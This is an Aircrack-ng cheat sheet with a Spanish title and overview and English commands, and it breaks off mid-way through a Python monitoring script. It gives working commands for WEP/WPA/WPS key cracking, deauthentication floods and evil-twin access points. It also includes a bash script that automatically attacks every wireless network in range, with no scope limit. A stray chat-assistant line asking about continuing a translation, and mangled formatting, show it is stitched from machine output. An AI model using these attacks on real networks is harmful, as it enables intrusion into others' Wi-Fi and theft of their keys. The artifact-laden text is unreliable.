Hoja de Trucos de Aircrack-ng¶
Descripción general¶
Aircrack-ng es un conjunto completo de herramientas de evaluación de seguridad de redes inalámbricas diseñadas para auditar redes WiFi y probar implementaciones de seguridad inalámbrica. Originalmente desarrollado como una bifurcación del proyecto Aircrack original, Aircrack-ng ha evolucionado hasta convertirse en el estándar de facto para pruebas de penetración inalámbrica e investigación de seguridad. El conjunto incluye múltiples herramientas especializadas que trabajan juntas para proporcionar capacidades completas de evaluación de redes inalámbricas, desde la captura y inyección de paquetes hasta la recuperación de claves de cifrado y manipulación de puntos de acceso.
El conjunto Aircrack-ng consta de varios componentes principales: airodump-ng para captura de paquetes inalámbricos y descubrimiento de redes, aireplay-ng para inyección de paquetes e implementación de ataques, aircrack-ng para recuperación de claves WEP y WPA/WPA2, y airmon-ng para gestión de interfaces inalámbricas y configuración de modo monitor. Herramientas adicionales incluyen airdecap-ng para descifrar paquetes capturados, packetforge-ng para crear paquetes personalizados, y airbase-ng para crear puntos de acceso falsos. Este enfoque modular permite a los profesionales de seguridad realizar evaluaciones específicas y personalizar su metodología de pruebas según requisitos específicos.
El framework soporta una amplia gama de protocolos de seguridad inalámbrica y vectores de ataque, incluyendo el descifrado WEP mediante análisis estadístico, captura de handshake WPA/WPA2 y ataques de diccionario, ataques PIN WPS, y varios ataques de inyección para probar la resiliencia de la red. Aircrack-ng es particularmente valioso para identificar implementaciones de cifrado débiles, probar configuraciones de puntos de acceso y validar políticas de seguridad inalámbrica. Con su comunidad de desarrollo activa y documentación extensa, Aircrack-ng sigue siendo una herramienta esencial para profesionales de seguridad inalámbrica, evaluadores de penetración y administradores de red responsables de asegurar infraestructuras inalámbricas.
Would you like me to continue with the translations for the remaining sections?```bash
Update system packages¶
sudo apt update && sudo apt upgrade -y
Install Aircrack-ng from repositories¶
sudo apt install -y aircrack-ng
Install additional dependencies¶
sudo apt install -y wireless-tools net-tools iw rfkill pcap-utils \ build-essential autoconf automake libtool pkg-config libnl-3-dev \ libnl-genl-3-dev libssl-dev ethtool shtool rfkill zlib1g-dev \ libpcap-dev libsqlite3-dev libpcre3-dev libhwloc-dev libcmocka-dev \ hostapd wpasupplicant tcpdump screen iw usbutils pciutils
Verify installation¶
aircrack-ng --help airodump-ng --help aireplay-ng --help
Check wireless interface capabilities¶
sudo airmon-ng
Install latest version from source (optional)¶
cd /tmp wget https://download.aircrack-ng.org/aircrack-ng-1.7.tar.gz tar -xzf aircrack-ng-1.7.tar.gz cd aircrack-ng-1.7
Configure and compile¶
autoreconf -i ./configure --with-experimental make -j$(nproc) sudo make install sudo ldconfig
Verify source installation¶
aircrack-ng --version
### CentOS/RHEL Installation
```bash
# Install EPEL repository
sudo yum install -y epel-release
# Install required packages
sudo yum groupinstall -y "Development Tools"
sudo yum install -y wireless-tools iw rfkill pcap-devel openssl-devel \
sqlite-devel pcre-devel hwloc-devel cmocka-devel libnl3-devel \
autoconf automake libtool pkg-config ethtool
# Install Aircrack-ng from EPEL
sudo yum install -y aircrack-ng
# Alternative: Install from source
cd /tmp
wget https://download.aircrack-ng.org/aircrack-ng-1.7.tar.gz
tar -xzf aircrack-ng-1.7.tar.gz
cd aircrack-ng-1.7
autoreconf -i
./configure --with-experimental
make -j$(nproc)
sudo make install
# Configure firewall
sudo firewall-cmd --permanent --add-port=67/udp
sudo firewall-cmd --permanent --add-port=68/udp
sudo firewall-cmd --reload
macOS Installation¶
# Install Homebrew (if not already installed)
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"
# Install Aircrack-ng
brew install aircrack-ng
# Install additional tools
brew install wireshark tcpdump
# Verify installation
aircrack-ng --version
# Note: macOS requires compatible USB WiFi adapter for monitor mode
# Built-in WiFi adapters typically don't support monitor mode
Kali Linux Installation¶
# Aircrack-ng is pre-installed on Kali Linux
# Update to latest version
sudo apt update
sudo apt install -y aircrack-ng
# Install additional wireless tools
sudo apt install -y reaver bully wifite hostapd-wpe freeradius-wpe \
asleap john hashcat hcxtools hcxdumptool
# Verify installation
aircrack-ng --version
Docker Installation¶
Running Aircrack-ng in Docker:
# Create Dockerfile for Aircrack-ng
cat > Dockerfile.aircrack << 'EOF'
FROM ubuntu:22.04
# Install dependencies
RUN apt-get update && apt-get install -y \
aircrack-ng wireless-tools iw rfkill \
tcpdump net-tools usbutils pciutils \
&& rm -rf /var/lib/apt/lists/*
# Create working directory
WORKDIR /data
# Default command
CMD ["aircrack-ng", "--help"]
EOF
# Build Docker image
docker build -f Dockerfile.aircrack -t aircrack-ng .
# Run with USB device access (for USB WiFi adapters)
docker run -it --rm --privileged \
-v $(pwd):/data \
--device=/dev/bus/usb \
aircrack-ng
# Run specific Aircrack-ng command
docker run -it --rm --privileged \
-v $(pwd):/data \
aircrack-ng \
airodump-ng --help
Basic Usage¶
Interface Management¶
Managing wireless interfaces and monitor mode:
# Check wireless interfaces
sudo airmon-ng
# Check interface details
iwconfig
sudo iw dev
# Kill interfering processes
sudo airmon-ng check kill
# Enable monitor mode
sudo airmon-ng start wlan0
# Check monitor mode interface (usually wlan0mon)
iwconfig
# Change channel
sudo iwconfig wlan0mon channel 6
sudo iw dev wlan0mon set channel 6
# Set specific frequency
sudo iw dev wlan0mon set freq 2437
# Disable monitor mode
sudo airmon-ng stop wlan0mon
# Restart network services
sudo systemctl restart NetworkManager
sudo systemctl restart wpa_supplicant
Network Discovery¶
Discovering wireless networks and clients:
# Basic network scan
sudo airodump-ng wlan0mon
# Scan specific channel
sudo airodump-ng -c 6 wlan0mon
# Scan specific BSSID
sudo airodump-ng --bssid AA:BB:CC:DD:EE:FF wlan0mon
# Write capture to file
sudo airodump-ng -w capture wlan0mon
# Show only WEP networks
sudo airodump-ng --encrypt WEP wlan0mon
# Show only WPA networks
sudo airodump-ng --encrypt WPA wlan0mon
# Scan with manufacturer lookup
sudo airodump-ng -M wlan0mon
# Scan specific frequency range
sudo airodump-ng --band a wlan0mon # 5GHz
sudo airodump-ng --band bg wlan0mon # 2.4GHz
# Advanced scanning options
sudo airodump-ng -c 1-13 --band bg -w scan_results wlan0mon
# Monitor specific network and clients
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w target wlan0mon
WEP Attacks¶
WEP encryption attacks and key recovery:
# Capture WEP traffic
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w wep_capture wlan0mon
# ARP replay attack (in new terminal)
sudo aireplay-ng -3 -b AA:BB:CC:DD:EE:FF -h CC:DD:EE:FF:AA:BB wlan0mon
# Fake authentication (if needed)
sudo aireplay-ng -1 0 -a AA:BB:CC:DD:EE:FF -h CC:DD:EE:FF:AA:BB wlan0mon
# Fragmentation attack
sudo aireplay-ng -5 -b AA:BB:CC:DD:EE:FF -h CC:DD:EE:FF:AA:BB wlan0mon
# ChopChop attack
sudo aireplay-ng -4 -b AA:BB:CC:DD:EE:FF -h CC:DD:EE:FF:AA:BB wlan0mon
# Interactive packet replay
sudo aireplay-ng -2 -b AA:BB:CC:DD:EE:FF -d FF:FF:FF:FF:FF:FF -f 1 -m 68 -n 86 wlan0mon
# Crack WEP key (run when sufficient IVs collected)
aircrack-ng wep_capture-01.cap
# Crack with specific key length
aircrack-ng -n 64 wep_capture-01.cap # 64-bit WEP
aircrack-ng -n 128 wep_capture-01.cap # 128-bit WEP
# Use custom wordlist
aircrack-ng -w wordlist.txt wep_capture-01.cap
WPA/WPA2 Attacks¶
WPA/WPA2 handshake capture and cracking:
# Capture WPA handshake
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w wpa_capture wlan0mon
# Deauthentication attack to force handshake (in new terminal)
sudo aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF wlan0mon
# Target specific client
sudo aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF -c CC:DD:EE:FF:AA:BB wlan0mon
# Verify handshake capture
aircrack-ng wpa_capture-01.cap
# Crack with wordlist
aircrack-ng -w /usr/share/wordlists/rockyou.txt wpa_capture-01.cap
# Crack specific BSSID
aircrack-ng -b AA:BB:CC:DD:EE:FF -w wordlist.txt wpa_capture-01.cap
# Use custom wordlist with rules
aircrack-ng -w custom_wordlist.txt wpa_capture-01.cap
# Crack with ESSID
aircrack-ng -e "NetworkName" -w wordlist.txt wpa_capture-01.cap
# Show handshake without cracking
aircrack-ng -J hashcat_format wpa_capture-01.cap
# Convert to hashcat format
aircrack-ng -J hashcat_hashes wpa_capture-01.cap
hashcat -m 2500 hashcat_hashes.hccapx wordlist.txt
WPS Attacks¶
WPS (WiFi Protected Setup) attacks:
# Scan for WPS-enabled networks
sudo airodump-ng --wps wlan0mon
# Reaver WPS PIN attack
sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv
# Reaver with specific options
sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv -L -N -d 15 -T .5 -c 6
# Bully WPS attack
sudo bully -b AA:BB:CC:DD:EE:FF -c 6 wlan0mon
# Pixie dust attack
sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv -K
# WPS PIN generation
sudo aircrack-ng -W pin_list.txt
# Check WPS lock status
sudo wash -i wlan0mon
Advanced Features¶
Custom Packet Injection¶
Creating and injecting custom packets:
# Create custom ARP packet
sudo packetforge-ng -0 -a AA:BB:CC:DD:EE:FF -h CC:DD:EE:FF:AA:BB -k 192.168.1.1 -l 192.168.1.100 -y fragment.xor -w arp_packet
# Inject custom packet
sudo aireplay-ng -2 -r arp_packet wlan0mon
# Create custom authentication packet
sudo packetforge-ng -1 -a AA:BB:CC:DD:EE:FF -h CC:DD:EE:FF:AA:BB -w auth_packet
# Create deauthentication packet
sudo packetforge-ng -1 -a AA:BB:CC:DD:EE:FF -h CC:DD:EE:FF:AA:BB -w deauth_packet
# Replay captured packet
sudo aireplay-ng -2 -r captured_packet.cap wlan0mon
# Interactive packet replay with modifications
sudo aireplay-ng -2 -b AA:BB:CC:DD:EE:FF -d FF:FF:FF:FF:FF:FF -m 68 -n 86 wlan0mon
Access Point Creation¶
Creating fake access points and evil twin attacks:
# Create open access point
sudo airbase-ng -e "FreeWiFi" -c 6 wlan0mon
# Create WEP access point
sudo airbase-ng -e "SecureWiFi" -c 6 -W 1 -z 2 -Z 4 wlan0mon
# Create access point with specific BSSID
sudo airbase-ng -e "TestAP" -c 6 -a AA:BB:CC:DD:EE:FF wlan0mon
# Evil twin attack (clone existing AP)
sudo airbase-ng -e "TargetNetwork" -c 6 -a AA:BB:CC:DD:EE:FF wlan0mon
# Capture clients connecting to fake AP
sudo airbase-ng -e "FreeWiFi" -c 6 -P -C 30 wlan0mon
# Create multiple access points
sudo airbase-ng -e "AP1" -e "AP2" -e "AP3" -c 6 wlan0mon
# Advanced evil twin with DHCP
sudo airbase-ng -e "TargetNetwork" -c 6 -a AA:BB:CC:DD:EE:FF wlan0mon &
sudo ifconfig at0 192.168.1.1 netmask 255.255.255.0
sudo route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1
sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
sudo iptables -A FORWARD -i at0 -o eth0 -j ACCEPT
echo 1 > /proc/sys/net/ipv4/ip_forward
# Start DHCP server for fake AP
sudo dnsmasq -C /dev/null -kd -F 192.168.1.100,192.168.1.200 -i at0 --bind-dynamic
Advanced Cracking Techniques¶
Advanced password cracking and optimization:
# Multi-threaded cracking
aircrack-ng -w wordlist.txt -p 4 capture.cap
# Cracking with custom character set
crunch 8 8 abcdefghijklmnopqrstuvwxyz|aircrack-ng -w - capture.cap
# Using John the Ripper with Aircrack-ng
aircrack-ng -J john_format capture.cap
john --wordlist=wordlist.txt john_format.hccap
# Hashcat integration
aircrack-ng -J hashcat_format capture.cap
hashcat -m 2500 -a 0 hashcat_format.hccapx wordlist.txt
# GPU-accelerated cracking with hashcat
hashcat -m 2500 -a 3 -w 3 hashcat_format.hccapx ?d?d?d?d?d?d?d?d
# Mask attack with hashcat
hashcat -m 2500 -a 3 hashcat_format.hccapx ?u?l?l?l?l?l?d?d
# Rule-based attack
hashcat -m 2500 -a 0 -r rules/best64.rule hashcat_format.hccapx wordlist.txt
# Combination attack
hashcat -m 2500 -a 1 hashcat_format.hccapx wordlist1.txt wordlist2.txt
# Distributed cracking setup
# On master node:
hashcat -m 2500 -a 0 --session=distributed hashcat_format.hccapx wordlist.txt
# On worker nodes:
hashcat -m 2500 -a 0 --session=worker1 --restore-file-path=distributed.restore hashcat_format.hccapx wordlist.txt
Packet Analysis and Decryption¶
Analyzing and decrypting captured packets:
# Decrypt WEP packets
airdecap-ng -w 1234567890 wep_capture.cap
# Decrypt WPA packets with passphrase
airdecap-ng -p passphrase -e "NetworkName" wpa_capture.cap
# Decrypt with PMK
airdecap-ng -k pmk_file wpa_capture.cap
# Extract specific packet types
airdecap-ng -t 1 capture.cap # Extract only data packets
# Analyze packet statistics
aircrack-ng -s capture.cap
# Show packet details
tcpdump -r decrypted_capture-dec.cap -v
# Convert to other formats
tshark -r capture.cap -w converted.pcapng
# Extract files from decrypted traffic
tcpflow -r decrypted_capture-dec.cap
# Analyze with Wireshark
wireshark decrypted_capture-dec.cap
Automation Scripts¶
Comprehensive WiFi Assessment Script¶
#!/bin/bash
# Comprehensive WiFi security assessment script
# Configuration
INTERFACE="wlan0"
MONITOR_INTERFACE=""
SCAN_TIME="60"
ATTACK_TIME="300"
OUTPUT_DIR="/tmp/wifi_assessment_$(date +%Y%m%d_%H%M%S)"
WORDLIST="/usr/share/wordlists/rockyou.txt"
# Create output directory
mkdir -p "$OUTPUT_DIR"
# Logging function
log_message() \\\\{
echo "$(date '+%Y-%m-%d %H:%M:%S') - $1"|tee -a "$OUTPUT_DIR/assessment.log"
\\\\}
# Cleanup function
cleanup() \\\\{
log_message "Cleaning up..."
# Stop monitor mode
if [ -n "$MONITOR_INTERFACE" ]; then
sudo airmon-ng stop "$MONITOR_INTERFACE" >/dev/null 2>&1
fi
# Restart network services
sudo systemctl restart NetworkManager >/dev/null 2>&1
# Kill background processes
sudo pkill -f airodump-ng
sudo pkill -f aireplay-ng
sudo pkill -f aircrack-ng
log_message "Cleanup completed"
\\\\}
# Signal handlers
trap cleanup EXIT
trap cleanup INT
trap cleanup TERM
# Check if running as root
check_root() \\\\{
if [ "$EUID" -ne 0 ]; then
echo "This script must be run as root"
exit 1
fi
\\\\}
# Check dependencies
check_dependencies() \\\\{
log_message "Checking dependencies..."
local deps=("aircrack-ng" "airodump-ng" "aireplay-ng" "airmon-ng")
for dep in "$\\\\{deps[@]\\\\}"; do
if ! command -v "$dep" >/dev/null 2>&1; then
log_message "ERROR: $dep not found"
exit 1
fi
done
if [ ! -f "$WORDLIST" ]; then
log_message "WARNING: Wordlist not found at $WORDLIST"
WORDLIST=""
fi
log_message "Dependencies check passed"
\\\\}
# Setup monitor mode
setup_monitor_mode() \\\\{
log_message "Setting up monitor mode on $INTERFACE..."
# Kill interfering processes
sudo airmon-ng check kill >/dev/null 2>&1
# Start monitor mode
local output
output=$(sudo airmon-ng start "$INTERFACE" 2>&1)
# Extract monitor interface name
MONITOR_INTERFACE=$(echo "$output"|grep -o "$\\\\{INTERFACE\\\\}mon\|mon[0-9]"|head -n 1)
if [ -z "$MONITOR_INTERFACE" ]; then
MONITOR_INTERFACE="$\\\\{INTERFACE\\\\}mon"
fi
# Verify monitor mode
if iwconfig "$MONITOR_INTERFACE" 2>/dev/null|grep -q "Mode:Monitor"; then
log_message "Monitor mode enabled on $MONITOR_INTERFACE"
else
log_message "ERROR: Failed to enable monitor mode"
exit 1
fi
\\\\}
# Network discovery
network_discovery() \\\\{
log_message "Starting network discovery for $SCAN_TIME seconds..."
local scan_file="$OUTPUT_DIR/network_scan"
# Start airodump-ng in background
sudo airodump-ng -w "$scan_file" --output-format csv "$MONITOR_INTERFACE" >/dev/null 2>&1 &
local airodump_pid=$!
# Wait for scan time
sleep "$SCAN_TIME"
# Stop airodump-ng
sudo kill $airodump_pid 2>/dev/null
# Parse results
if [ -f "$\\\\{scan_file\\\\}-01.csv" ]; then
log_message "Networks discovered:"
# Parse CSV and display networks
tail -n +2 "$\\\\{scan_file\\\\}-01.csv"|head -n -3|while IFS=',' read -r bssid first_seen last_seen channel speed privacy cipher auth power beacons iv lan_ip id_length essid key; do
if [ -n "$bssid" ] && [ "$bssid" != "BSSID" ]; then
essid=$(echo "$essid"|tr -d ' ')
if [ -n "$essid" ]; then
log_message " BSSID: $bssid, ESSID: $essid, Channel: $channel, Encryption: $privacy"
# Save target info
echo "$bssid,$essid,$channel,$privacy" >> "$OUTPUT_DIR/targets.txt"
fi
fi
done
else
log_message "No networks discovered"
fi
\\\\}
# WEP attack
wep_attack() \\\\{
local bssid="$1"
local essid="$2"
local channel="$3"
log_message "Starting WEP attack against $essid ($bssid)"
local capture_file="$OUTPUT_DIR/wep_$\\\\{essid\\\\}_$(echo $bssid|tr ':' '_')"
# Set channel
sudo iwconfig "$MONITOR_INTERFACE" channel "$channel"
# Start capture
sudo airodump-ng -c "$channel" --bssid "$bssid" -w "$capture_file" "$MONITOR_INTERFACE" >/dev/null 2>&1 &
local airodump_pid=$!
# Wait a bit for capture to start
sleep 5
# Try fake authentication
sudo aireplay-ng -1 0 -a "$bssid" "$MONITOR_INTERFACE" >/dev/null 2>&1 &
local auth_pid=$!
# ARP replay attack
sudo aireplay-ng -3 -b "$bssid" "$MONITOR_INTERFACE" >/dev/null 2>&1 &
local arp_pid=$!
# Wait for attack time
sleep "$ATTACK_TIME"
# Stop attacks
sudo kill $airodump_pid $auth_pid $arp_pid 2>/dev/null
# Try to crack
if [ -f "$\\\\{capture_file\\\\}-01.cap" ]; then
log_message "Attempting to crack WEP key for $essid..."
local crack_result
crack_result=$(timeout 60 aircrack-ng "$\\\\{capture_file\\\\}-01.cap" 2>/dev/null)
if echo "$crack_result"|grep -q "KEY FOUND"; then
local key=$(echo "$crack_result"|grep "KEY FOUND"|cut -d'[' -f2|cut -d']' -f1)
log_message "SUCCESS: WEP key found for $essid: $key"
echo "$bssid,$essid,WEP,$key" >> "$OUTPUT_DIR/cracked_keys.txt"
else
log_message "Failed to crack WEP key for $essid"
fi
fi
\\\\}
# WPA attack
wpa_attack() \\\\{
local bssid="$1"
local essid="$2"
local channel="$3"
log_message "Starting WPA attack against $essid ($bssid)"
local capture_file="$OUTPUT_DIR/wpa_$\\\\{essid\\\\}_$(echo $bssid|tr ':' '_')"
# Set channel
sudo iwconfig "$MONITOR_INTERFACE" channel "$channel"
# Start capture
sudo airodump-ng -c "$channel" --bssid "$bssid" -w "$capture_file" "$MONITOR_INTERFACE" >/dev/null 2>&1 &
local airodump_pid=$!
# Wait a bit for capture to start
sleep 5
# Deauthentication attack to capture handshake
for i in \\\\{1..5\\\\}; do
sudo aireplay-ng -0 10 -a "$bssid" "$MONITOR_INTERFACE" >/dev/null 2>&1
sleep 10
done
# Stop capture
sudo kill $airodump_pid 2>/dev/null
# Check for handshake
if [ -f "$\\\\{capture_file\\\\}-01.cap" ]; then
local handshake_check
handshake_check=$(aircrack-ng "$\\\\{capture_file\\\\}-01.cap" 2>/dev/null|grep "1 handshake")
if [ -n "$handshake_check" ]; then
log_message "Handshake captured for $essid"
# Try to crack with wordlist
if [ -n "$WORDLIST" ] && [ -f "$WORDLIST" ]; then
log_message "Attempting to crack WPA key for $essid with wordlist..."
local crack_result
crack_result=$(timeout 300 aircrack-ng -w "$WORDLIST" -b "$bssid" "$\\\\{capture_file\\\\}-01.cap" 2>/dev/null)
if echo "$crack_result"|grep -q "KEY FOUND"; then
local key=$(echo "$crack_result"|grep "KEY FOUND"|cut -d'[' -f2|cut -d']' -f1)
log_message "SUCCESS: WPA key found for $essid: $key"
echo "$bssid,$essid,WPA,$key" >> "$OUTPUT_DIR/cracked_keys.txt"
else
log_message "Failed to crack WPA key for $essid with wordlist"
echo "$bssid,$essid,WPA,HANDSHAKE_CAPTURED" >> "$OUTPUT_DIR/handshakes.txt"
fi
else
log_message "No wordlist available for WPA cracking"
echo "$bssid,$essid,WPA,HANDSHAKE_CAPTURED" >> "$OUTPUT_DIR/handshakes.txt"
fi
else
log_message "No handshake captured for $essid"
fi
fi
\\\\}
# WPS attack
wps_attack() \\\\{
local bssid="$1"
local essid="$2"
local channel="$3"
log_message "Starting WPS attack against $essid ($bssid)"
# Set channel
sudo iwconfig "$MONITOR_INTERFACE" channel "$channel"
# Check if reaver is available
if command -v reaver >/dev/null 2>&1; then
# Try Pixie Dust attack first
log_message "Attempting Pixie Dust attack on $essid..."
local pixie_result
pixie_result=$(timeout 120 reaver -i "$MONITOR_INTERFACE" -b "$bssid" -c "$channel" -K -vv 2>/dev/null)
if echo "$pixie_result"|grep -q "WPS PIN:"; then
local pin=$(echo "$pixie_result"|grep "WPS PIN:"|cut -d':' -f2|tr -d ' ')
local psk=$(echo "$pixie_result"|grep "WPA PSK:"|cut -d':' -f2|tr -d ' ')
log_message "SUCCESS: WPS PIN found for $essid: $pin"
log_message "SUCCESS: WPA PSK found for $essid: $psk"
echo "$bssid,$essid,WPS,$pin,$psk" >> "$OUTPUT_DIR/cracked_keys.txt"
else
log_message "Pixie Dust attack failed for $essid"
# Try regular WPS PIN attack (limited time)
log_message "Attempting WPS PIN brute force on $essid..."
timeout 300 reaver -i "$MONITOR_INTERFACE" -b "$bssid" -c "$channel" -vv >/dev/null 2>&1
fi
else
log_message "Reaver not available for WPS attacks"
fi
\\\\}
# Attack networks
attack_networks() \\\\{
log_message "Starting attacks on discovered networks..."
if [ ! -f "$OUTPUT_DIR/targets.txt" ]; then
log_message "No targets found"
return
fi
while IFS=',' read -r bssid essid channel encryption; do
if [ -n "$bssid" ]; then
log_message "Attacking $essid ($bssid) - $encryption"
case "$encryption" in
*"WEP"*)
wep_attack "$bssid" "$essid" "$channel"
;;
*"WPA"*)
wpa_attack "$bssid" "$essid" "$channel"
# Also try WPS if available
wps_attack "$bssid" "$essid" "$channel"
;;
*"OPN"*)
log_message "Open network detected: $essid"
echo "$bssid,$essid,OPEN,NO_PASSWORD" >> "$OUTPUT_DIR/open_networks.txt"
;;
esac
fi
done < "$OUTPUT_DIR/targets.txt"
\\\\}
# Generate report
generate_report() \\\\{
log_message "Generating assessment report..."
local report_file="$OUTPUT_DIR/wifi_assessment_report.html"
cat > "$report_file" << EOF
<!DOCTYPE html>
<html>
<head>
<title>WiFi Security Assessment Report</title>
<style>
body \\\\{ font-family: Arial, sans-serif; margin: 20px; \\\\}
.section \\\\{ margin: 20px 0; padding: 15px; border: 1px solid #ddd; \\\\}
.success \\\\{ color: green; font-weight: bold; \\\\}
.warning \\\\{ color: orange; font-weight: bold; \\\\}
.error \\\\{ color: red; font-weight: bold; \\\\}
table \\\\{ border-collapse: collapse; width: 100%; \\\\}
th, td \\\\{ border: 1px solid #ddd; padding: 8px; text-align: left; \\\\}
th \\\\{ background-color: #f2f2f2; \\\\}
pre \\\\{ background: #f5f5f5; padding: 10px; overflow-x: auto; \\\\}
</style>
</head>
<body>
<h1>WiFi Security Assessment Report</h1>
<p>Generated: $(date)</p>
<p>Interface: $INTERFACE ($MONITOR_INTERFACE)</p>
<p>Scan Duration: $SCAN_TIME seconds</p>
<p>Attack Duration: $ATTACK_TIME seconds per target</p>
<div class="section">
<h2>Executive Summary</h2>
EOF
# Count results
local total_networks=0
local cracked_networks=0
local open_networks=0
local handshakes=0
if [ -f "$OUTPUT_DIR/targets.txt" ]; then
total_networks=$(wc -l < "$OUTPUT_DIR/targets.txt")
fi
if [ -f "$OUTPUT_DIR/cracked_keys.txt" ]; then
cracked_networks=$(wc -l < "$OUTPUT_DIR/cracked_keys.txt")
fi
if [ -f "$OUTPUT_DIR/open_networks.txt" ]; then
open_networks=$(wc -l < "$OUTPUT_DIR/open_networks.txt")
fi
if [ -f "$OUTPUT_DIR/handshakes.txt" ]; then
handshakes=$(wc -l < "$OUTPUT_DIR/handshakes.txt")
fi
cat >> "$report_file" << EOF
<ul>
<li>Total networks discovered: $total_networks</li>
<li>Networks with compromised security: $cracked_networks</li>
<li>Open networks: $open_networks</li>
<li>WPA handshakes captured: $handshakes</li>
</ul>
</div>
<div class="section">
<h2>Discovered Networks</h2>
<table>
<tr><th>BSSID</th><th>ESSID</th><th>Channel</th><th>Encryption</th></tr>
EOF
if [ -f "$OUTPUT_DIR/targets.txt" ]; then
while IFS=',' read -r bssid essid channel encryption; do
echo " <tr><td>$bssid</td><td>$essid</td><td>$channel</td><td>$encryption</td></tr>" >> "$report_file"
done < "$OUTPUT_DIR/targets.txt"
fi
cat >> "$report_file" << EOF
</table>
</div>
<div class="section">
<h2>Security Vulnerabilities</h2>
EOF
if [ -f "$OUTPUT_DIR/cracked_keys.txt" ]; then
echo " <h3 class=\"error\">Compromised Networks</h3>" >> "$report_file"
echo " <table>" >> "$report_file"
echo " <tr><th>BSSID</th><th>ESSID</th><th>Type</th><th>Key/PIN</th></tr>" >> "$report_file"
while IFS=',' read -r bssid essid type key; do
echo " <tr><td>$bssid</td><td>$essid</td><td>$type</td><td>$key</td></tr>" >> "$report_file"
done < "$OUTPUT_DIR/cracked_keys.txt"
echo " </table>" >> "$report_file"
fi
if [ -f "$OUTPUT_DIR/open_networks.txt" ]; then
echo " <h3 class=\"warning\">Open Networks</h3>" >> "$report_file"
echo " <table>" >> "$report_file"
echo " <tr><th>BSSID</th><th>ESSID</th></tr>" >> "$report_file"
while IFS=',' read -r bssid essid type status; do
echo " <tr><td>$bssid</td><td>$essid</td></tr>" >> "$report_file"
done < "$OUTPUT_DIR/open_networks.txt"
echo " </table>" >> "$report_file"
fi
cat >> "$report_file" << EOF
</div>
<div class="section">
<h2>Assessment Log</h2>
<pre>$(cat "$OUTPUT_DIR/assessment.log")</pre>
</div>
</body>
</html>
EOF
log_message "Report generated: $report_file"
\\\\}
# Main execution
main() \\\\{
log_message "Starting WiFi security assessment"
check_root
check_dependencies
setup_monitor_mode
network_discovery
attack_networks
generate_report
log_message "Assessment completed. Results in: $OUTPUT_DIR"
\\\\}
# Parse command line arguments
while [[ $# -gt 0 ]]; do
case $1 in
-i|--interface)
INTERFACE="$2"
shift 2
;;
-s|--scan-time)
SCAN_TIME="$2"
shift 2
;;
-a|--attack-time)
ATTACK_TIME="$2"
shift 2
;;
-w|--wordlist)
WORDLIST="$2"
shift 2
;;
-h|--help)
echo "Usage: $0 [OPTIONS]"
echo "Options:"
echo " -i, --interface IFACE Wireless interface (default: wlan0)"
echo " -s, --scan-time SECONDS Network discovery time (default: 60)"
echo " -a, --attack-time SECONDS Attack time per target (default: 300)"
echo " -w, --wordlist FILE Wordlist for WPA cracking"
echo " -h, --help Show this help"
exit 0
;;
*)
echo "Unknown option: $1"
exit 1
;;
esac
done
# Run main function
main
Integration Examples¶
Continuous Monitoring Script¶
#!/usr/bin/env python3
# Aircrack-ng continuous monitoring and alerting
import subprocess
import time
import json
import smtplib
import logging
from datetime import datetime
from email.mime.text import MimeText
from email.mime.multipart import MimeMultipart
class WiFiMonitor:
def __init__(self, config):
self.config = config
self.interface = config.get('interface', 'wlan0mon')
self.scan_interval = config.get('scan_interval', 300) # 5 minutes
self.known_networks = set()
self.setup_logging()
def setup_logging(self):
logging.basicConfig(
level=logging.INFO,
format='%(asctime)s - %(levelname)s - %(message)s',
handlers=[
logging.FileHandler('/var/log/wifi_monitor.log'),
logging.StreamHandler()
]
)
self.logger = logging.getLogger(__name__)
def scan_networks(self):
"""Scan for wireless networks"""
try:
# Run airodump-ng for a short scan
cmd = [
'timeout', '30',
'airodump-ng', '--output-format', 'csv',
'-w', '/tmp/wifi_scan', self.interface
]
subprocess.run(cmd, capture_output=True, text=True)
# Parse results
networks = self.parse_scan_results('/tmp/wifi_scan-01.csv')
return networks
except Exception as e:
self.logger.error(f"Error scanning networks: \\\\{e\\\\}")
return []
def parse_scan_results(self, csv_file):
"""Parse airodump-ng CSV output"""
networks = []
try:
with open(csv_file, 'r') as f:
lines = f.readlines()
# Find the start of network data
start_idx = 0
for i, line in enumerate(lines):
if line.startswith('BSSID'):
start_idx = i + 1
break
# Parse network entries
for line in lines[start_idx:]:
if line.strip() and not line.startswith('Station MAC'):
parts = line.split(',')
if len(parts) >= 14:
network = \\\\{
'bssid': parts[0].strip(),
'first_seen': parts[1].strip(),
'last_seen': parts[2].strip(),
'channel': parts[3].strip(),
'speed': parts[4].strip(),
'privacy': parts[5].strip(),
'cipher': parts[6].strip(),
'authentication': parts[7].strip(),
'power': parts[8].strip(),
'beacons': parts[9].strip(),
'iv': parts[10].strip(),
'lan_ip': parts[11].strip(),
'id_length': parts[12].strip(),
'essid': parts[13].strip(),
'timestamp': datetime.now().isoformat()
\\\\}
if network['bssid'] and network['essid']:
networks.append(network)
except FileNotFoundError:
self.logger.warning(f"Scan results file not found: \\\\{csv_file\\\\}")
except Exception as e:
self.logger.error(f"Error parsing scan results: \\\\{e\\\\}")
return networks
def detect_anomalies(self, networks):
"""Detect suspicious network activity"""
alerts = []
for network in networks:
network_id = f"\\\\{network['bssid']\\\\}_\\\\{network['essid']\\\\}"
# Check for new networks
if network_id not in self.known_networks:
self.known_networks.add(network_id)
# Alert on suspicious network names
suspicious_names = [
'free', 'wifi', 'internet', 'guest', 'public',
'linksys', 'netgear', 'dlink', 'default'
]
essid_lower = network['essid'].lower()
if any(name in essid_lower for name in suspicious_names):
alerts.append(\\\\{
'type': 'suspicious_network',
'severity': 'medium',
'message': f"Suspicious network detected: \\\\{network['essid']\\\\} (\\\\{network['bssid']\\\\})",
'network': network
\\\\})
# Alert on open networks
if 'OPN' in network['privacy']:
alerts.append(\\\\{
'type': 'open_network',
'severity': 'low',
'message': f"Open network detected: \\\\{network['essid']\\\\} (\\\\{network['bssid']\\\\})",
